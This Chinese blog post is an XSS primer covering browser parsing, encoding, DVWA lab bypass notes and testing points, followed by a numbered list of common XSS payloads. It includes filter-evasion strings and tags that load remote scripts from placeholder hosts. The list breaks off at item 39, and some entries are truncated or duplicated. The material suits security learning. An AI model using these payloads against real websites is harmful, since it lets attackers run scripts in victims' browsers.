<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=6.7.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.7.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.7.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '6.7.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  






  <meta name="description" content="XSS漏洞基础XSS入门介绍https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 解析器如何工作For example, a  tag may be able to terminate a script block even if it is injected inside a quoted string inside a metho">
<meta name="keywords" content="XSS,漏洞学习">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS入门总结">
<meta property="og:url" content="http://yoursite.com/2019/07/24/xss入门总结/index.html">
<meta property="og:site_name" content="Huha&#39;s Blog">
<meta property="og:description" content="XSS漏洞基础XSS入门介绍https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 解析器如何工作For example, a  tag may be able to terminate a script block even if it is injected inside a quoted string inside a metho">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-07-24T13:38:29.387Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS入门总结">
<meta name="twitter:description" content="XSS漏洞基础XSS入门介绍https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 解析器如何工作For example, a  tag may be able to terminate a script block even if it is injected inside a quoted string inside a metho">






  <link rel="canonical" href="http://yoursite.com/2019/07/24/xss入门总结/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>XSS入门总结 | Huha's Blog</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Huha's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  


</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/07/24/xss入门总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Huha">
      <meta itemprop="description" content="空集是所有集合的子集">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Huha's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS入门总结

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-07-24 21:36:54 / 修改时间：21:38:29" itemprop="dateCreated datePublished" datetime="2019-07-24T21:36:54+08:00">2019-07-24</time>
            

            
              

              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/Web安全/" itemprop="url" rel="index"><span itemprop="name">Web安全</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="XSS漏洞基础"><a href="#XSS漏洞基础" class="headerlink" title="XSS漏洞基础"></a>XSS漏洞基础</h2><h4 id="XSS入门介绍"><a href="#XSS入门介绍" class="headerlink" title="XSS入门介绍"></a>XSS入门介绍</h4><p><a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" target="_blank" rel="noopener">https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)</a></p>
<h4 id="解析器如何工作"><a href="#解析器如何工作" class="headerlink" title="解析器如何工作"></a>解析器如何工作</h4><p>For example, a  tag may be able to terminate a script block even if it is injected inside a quoted string inside a method call inside the script. This happens because the HTML parser runs before the JavaScript parser.</p>
<ul>
<li>XSS解析器就是浏览器</li>
</ul>
<h4 id="HTML-entities（HTML-实体）"><a href="#HTML-entities（HTML-实体）" class="headerlink" title="HTML entities（HTML 实体）"></a>HTML entities（HTML 实体）</h4><p>HTML中的保留字符（Reserved characters）都会被替换为HTML实体（&lt;&gt;）<br><a href="https://www.w3schools.com/html/html_entities.asp" target="_blank" rel="noopener">https://www.w3schools.com/html/html_entities.asp</a> </p>
<h4 id="浏览器如何解码（Freebuf博主）"><a href="#浏览器如何解码（Freebuf博主）" class="headerlink" title="浏览器如何解码（Freebuf博主）"></a>浏览器如何解码（Freebuf博主）</h4><p><a href="https://www.freebuf.com/articles/web/10121.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/10121.html</a></p>
<h4 id="XSS漏洞复现"><a href="#XSS漏洞复现" class="headerlink" title="XSS漏洞复现"></a>XSS漏洞复现</h4><p><a href="http://v0w.top/2018/08/16/XSS%E5%8E%9F%E7%90%86%E5%8F%8A%E5%A4%8D%E7%8E%B0/#%E5%AD%98%E5%82%A8%E5%9E%8BXSS" target="_blank" rel="noopener">http://v0w.top/2018/08/16/XSS%E5%8E%9F%E7%90%86%E5%8F%8A%E5%A4%8D%E7%8E%B0/#%E5%AD%98%E5%82%A8%E5%9E%8BXSS</a></p>
<ul>
<li>&lt; script &gt;标签内的标准弹框语句，不经过数据库存取<br>  alert(1)<br>  alert(“xss”)<br>  alert(/xss/)<br>  alert(‘xss’)</li>
</ul>
<ul>
<li>经过数据库存取<br>  alert(1)<br>  alert(“xss”)<br>  alert(/xss/)<br>  alert(\ ‘xss\ ‘)（mysql插入数据时默认用单引号包围，再包括单引号出现语法错误）</li>
</ul>
<ul>
<li>DOM复现的绕过语句：<br>‘&gt;&lt; img src=# onerror=”alert(‘XSS’)”&gt;&lt;’<br>‘ onclick=alert(/xss/) //<br>‘ onclick=’alert(/xss/)’     # 单引号双引号都没有关系</li>
<li>注：<br>“    &gt;testLink    “前面的有个单引号，如果没有明显的引号与前面的属性分开，会与前面的属性结合后再自动添加引号（如果是事件类型），所以可以使用“  空格//  ”分隔，或者直接显示用引号包括事件，如上第二种解决方法。</li>
</ul>
<h4 id="DVWA安装："><a href="#DVWA安装：" class="headerlink" title="DVWA安装："></a>DVWA安装：</h4><p><a href="https://github.com/ethicalhack3r/DVWA" target="_blank" rel="noopener">https://github.com/ethicalhack3r/DVWA</a></p>
<h4 id="DVWA靶场游玩攻略（XSS）："><a href="#DVWA靶场游玩攻略（XSS）：" class="headerlink" title="DVWA靶场游玩攻略（XSS）："></a>DVWA靶场游玩攻略（XSS）：</h4><p><a href="https://www.freebuf.com/articles/web/123779.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/123779.html</a><br><a href="https://www.hackingarticles.in/understanding-dom-based-xss-dvwa-bypass-security/" target="_blank" rel="noopener">https://www.hackingarticles.in/understanding-dom-based-xss-dvwa-bypass-security/</a></p>
<p><strong>DVWA XSS Reflected</strong><br>•    过滤了“&lt; script &gt;”标签，使用大小写，双写， 添加src属性绕过</p>
<p>•    若采用正则匹配过滤“&lt; script &gt;”，之前方法都行不通，考虑使用其他标签：<br>​    iframe<br>​    input<br>     img<br>​    body<br>​    添加src属性，利用鼠标事件（通用）：<br>​    &lt; IMG SRC=# onmouseover=”alert(‘xxs’)”&gt;<br>​    利用error事件，适用img<br>​    &lt; IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”&gt;</p>
<p>•    htmlspecialchars( $_GET[ ‘name’ ] );无解</p>
<p><strong>DVWA XSS Store</strong><br>•    mysqli_real_escape_string()转移字符串（SQL中的特殊字符）：<br>一次转义对SQL命令并无太大影响，数据库会存储未转义前的字符</p>
<p>•    stripslashes()去除反斜杠</p>
<p>•    name字段的限制可以通过burp抓包修改</p>
<p>•    addslashes( $ message ),mysqli_real_escape_string（$ message）,htmlspecialchars( $ message )，多次转义，数据库中的特殊符号带上反斜杠，并且$message中的HTML保留字符被转换为HTML实体，impossible级别</p>
<p><strong>DVWA DOM XSS</strong><br>•    基于client的XSS漏洞<br>•    the hash symbol(#)不会被服务端接收到（#后面的部分称为fragment）</p>
<h4 id="XSS平台搭建"><a href="#XSS平台搭建" class="headerlink" title="XSS平台搭建"></a>XSS平台搭建</h4><ul>
<li>教程：<br><a href="https://cread.jd.com/read/startRead.action?bookId=30432053&amp;readType=1" target="_blank" rel="noopener">https://cread.jd.com/read/startRead.action?bookId=30432053&amp;readType=1</a><br><a href="https://blog.csdn.net/u011781521/article/details/53895363" target="_blank" rel="noopener">https://blog.csdn.net/u011781521/article/details/53895363</a>  </li>
<li>window10配置静态文件<br><a href="https://blog.csdn.net/cz_devil/article/details/16826647" target="_blank" rel="noopener">https://blog.csdn.net/cz_devil/article/details/16826647</a><br><a href="https://blog.csdn.net/qq_16241043/article/details/54176442" target="_blank" rel="noopener">https://blog.csdn.net/qq_16241043/article/details/54176442</a></li>
<li>查看Apache启动失败的错误信息：<br>打开cmd，输入：D:\phpStudy\Apache\binhttpd.exe -t 回车，即显示错误信息</li>
</ul>
<h2 id="XSS漏洞挖掘"><a href="#XSS漏洞挖掘" class="headerlink" title="XSS漏洞挖掘"></a>XSS漏洞挖掘</h2><p><strong>识别URL上的输入点</strong><br>可控点：&lt; path&gt;&lt; query&gt;&lt; fragement&gt;<br>•    web2.0的URL与传统形式上的差异：更强调明确含义（web2.0url名称与传统URL的映射）<br>•    需要强大的爬虫进行识别<br>•    fragment可能出现在服务端解析中</p>
<p><strong>进行XSS测试时，可能的输出点</strong></p>
<p><strong>HTML标签之间</strong></p>
<ol>
<li>直接输入js代码</li>
<li>闭合标签（其他标签无法执行HTML代码）</li>
</ol>
<ul>
<li>注：<br>div<br>pre<br>code<br>这三个标签可以解析HTML代码，不可以解析的标签实际上是进行了htmencode编码</li>
</ul>
<p><strong>HTML标签之内（属性）</strong></p>
<ol start="3">
<li>利用事件（效果比较差）</li>
<li>闭合属性，闭合标签（成功率较低）</li>
<li>特殊属性src/href/action<br>href执行javascript伪协议，过滤//，考虑js字符串的加减乘除<br>onerror(适用img)<br>data伪协议</li>
</ol>
<p><strong>成为js代码</strong></p>
<ol start="6">
<li>闭合script标签</li>
<li>绕过变量引用</li>
</ol>
<p><strong>HTML与js的自解码与编码函数</strong><br>•    HTML标签内（&lt;&gt;&amp;）</p>
<ol start="8">
<li>entity_name：&amp;#xH  &amp;#D（可以去除分号）</li>
<li>entity_number:&lt;</li>
<li>使用htmlspecialchars（）主动编码</li>
</ol>
<p>•    JS上下文内</p>
<ol start="11">
<li>unicode格式：\uH（中文要使用）</li>
<li>普通的八进制：\65\65 </li>
<li>普通16进制：\xH</li>
<li>反斜杠：&#39;,&quot;,&lt;,&gt;</li>
</ol>
<p><strong>urlncode编码</strong><br>•    firefox 和 chorm都会默认url编码  ‘“&lt;&gt;这四种字符，#号后面单引号不会编码，但其他字符还是会进行编码<br>•    PHP中$_SERVER[QUERY_STRING]获取urlencode后的内容</p>
<p><strong>URL编码——利用JS统一编码</strong><br><a href="http://www.ruanyifeng.com/blog/2010/02/url_encoding.html" target="_blank" rel="noopener">http://www.ruanyifeng.com/blog/2010/02/url_encoding.html</a></p>
<p><strong>补充：</strong><br>正常unicode格式：\u5487</p>
<p>escape（）编码后：%u5487<br>escapeURI（）编码后：utf-8方式（三个字节）%E7%A2%94（同样百分号开头）<br>escapeURIComponent（）编码后：类似第二种，所有字符编码</p>
<ul>
<li>注：<br>  编码解码函数参数都可以接收unicode字符，<br>  如果是ASCII范围内，结果返回可打印的字符，<br>  如果超出这个范围，编码正常（可能是unicode模式，可能是utf-8形式），解码都是返回相应的字符<br>  思考：<br>  其次，escape()不对”+”编码。但是我们知道，网页在提交表单的时候，如果有空格，则会被转化为+字符。服    务器处理数据的时候，会把+号处理成空格。所以，使用的时候要小心。</li>
</ul>
<h4 id="XSS-game"><a href="#XSS-game" class="headerlink" title="XSS game"></a>XSS game</h4><blockquote>
<p><a href="http://www.behindthefirewalls.com/2014/06/xss-game-by-google-exercises-4-5-and-6.html" target="_blank" rel="noopener">http://www.behindthefirewalls.com/2014/06/xss-game-by-google-exercises-4-5-and-6.html</a></p>
</blockquote>
<h4 id="Hack-me"><a href="#Hack-me" class="headerlink" title="Hack me"></a>Hack me</h4><p><a href="https://hack.me/" target="_blank" rel="noopener">https://hack.me/</a></p>
<h4 id="XSStrike"><a href="#XSStrike" class="headerlink" title="XSStrike"></a>XSStrike</h4><p><a href="https://github.com/s0md3v/XSStrike" target="_blank" rel="noopener">https://github.com/s0md3v/XSStrike</a></p>
<h4 id="基于DOM的XSS模糊测试论文（基础打好后再看）"><a href="#基于DOM的XSS模糊测试论文（基础打好后再看）" class="headerlink" title="基于DOM的XSS模糊测试论文（基础打好后再看）"></a>基于DOM的XSS模糊测试论文（基础打好后再看）</h4><p><a href="https://www.hindawi.com/journals/jcnc/2018/8159548/" target="_blank" rel="noopener">https://www.hindawi.com/journals/jcnc/2018/8159548/</a></p>
<h2 id="附常见的XSS攻击方法"><a href="#附常见的XSS攻击方法" class="headerlink" title="附常见的XSS攻击方法"></a>附常见的XSS攻击方法</h2><p>(1)普通的XSS <a href="https://lvtao.net/tag/javascript/" target="_blank" rel="noopener">JavaScript</a>注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT SRC=http://3w.org/XSS/xss.js&gt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(2)IMG标签XSS使用JavaScript命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=http://3w.org/XSS/xss.js/&gt;</span><br></pre></td></tr></table></figure>

<p>(3)IMG标签无分号无引号</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;</span><br></pre></td></tr></table></figure>

<p>(4)IMG标签大小写不敏感</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;</span><br></pre></td></tr></table></figure>

<p>(5)HTML编码(必须有分号)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=javascript:alert(&quot;XSS&quot;)&gt;</span><br></pre></td></tr></table></figure>

<p>(6)修正缺陷IMG标签</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(7)formCharCode标签(计算器)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;</span><br></pre></td></tr></table></figure>

<p>(8)UTF-8的Unicode编码(计算器)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=jav..省略..S&apos;)&gt;</span><br></pre></td></tr></table></figure>

<p>(9)7位的UTF-8的Unicode编码是没有分号的(计算器)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=jav..省略..S&apos;)&gt;</span><br></pre></td></tr></table></figure>

<p>(10)十六进制编码也是没有分号(计算器)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61..省略..&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</span><br></pre></td></tr></table></figure>

<p>(11)嵌入式标签,将Javascript分开</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=&quot;jav ascript:alert(&apos;XSS&apos;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(12)嵌入式编码标签,将Javascript分开</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=&quot;jav ascript:alert(&apos;XSS&apos;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(13)嵌入式换行符</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=&quot;jav ascript:alert(&apos;XSS&apos;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(14)嵌入式回车</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=&quot;jav ascript:alert(&apos;XSS&apos;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(15)嵌入式多行注入JavaScript,这是XSS极端的例子</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(16)解决限制字符(要求同页面)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;z=&apos;document.&apos;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;z=z+&apos;write(&quot;&apos;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;z=z+&apos;&lt;script&apos;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;z=z+&apos; src=ht&apos;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;z=z+&apos;tp://ww&apos;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;z=z+&apos;w.shell&apos;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;z=z+&apos;.net/1.&apos;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;z=z+&apos;js&gt;&lt;/sc&apos;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;z=z+&apos;ript&gt;&quot;)&apos;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;eval_r(z)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>(17)空字符12-7-1 T00LS - Powered by Discuz! Board</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">https://www.a.com/viewthread.php?action=printable&amp;tid=15267 2/6</span><br><span class="line"></span><br><span class="line">perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;&quot;;&apos; &gt; out</span><br></pre></td></tr></table></figure>

<p>(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">perl -e &apos;print &quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out</span><br></pre></td></tr></table></figure>

<p>(19)Spaces和meta前的IMG标签</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=&quot; javascript:alert(&apos;XSS&apos;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(20)Non-alpha-non-digit XSS</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT/XSS SRC=&quot;http://3w.org/XSS/xss.js&quot;&gt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(21)Non-alpha-non-digit XSS to 2</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;</span><br></pre></td></tr></table></figure>

<p>(22)Non-alpha-non-digit XSS to 3</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT/SRC=&quot;http://3w.org/XSS/xss.js&quot;&gt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(23)双开括号</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(24)无结束脚本标记(仅火狐等浏览器)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT SRC=http://3w.org/XSS/xss.js?&lt;B&gt;</span><br></pre></td></tr></table></figure>

<p>(25)无结束脚本标记2</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT SRC=//3w.org/XSS/xss.js&gt;</span><br></pre></td></tr></table></figure>

<p>(26)半开的HTML/JavaScript XSS</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;</span><br></pre></td></tr></table></figure>

<p>(27)双开角括号</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=http://3w.org/XSS.html &lt;</span><br></pre></td></tr></table></figure>

<p>(28)无单引号 双引号 分号</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT&gt;a=/XSS/</span><br><span class="line"></span><br><span class="line">alert(a.source)&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(29)换码过滤的JavaScript</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\&quot;;alert(&apos;XSS&apos;);//</span><br></pre></td></tr></table></figure>

<p>(30)结束Title标签</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(31)Input Image</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;INPUT SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(32)BODY Image</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(33)BODY标签</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BODY(&apos;XSS&apos;)&gt;</span><br></pre></td></tr></table></figure>

<p>(34)IMG Dynsrc</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(35)IMG Lowsrc</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(36)BGSOUND</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(37)STYLE sheet</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(38)远程样式表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://3w.org/xss.css&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(39)List-style-image(列表式)</p>
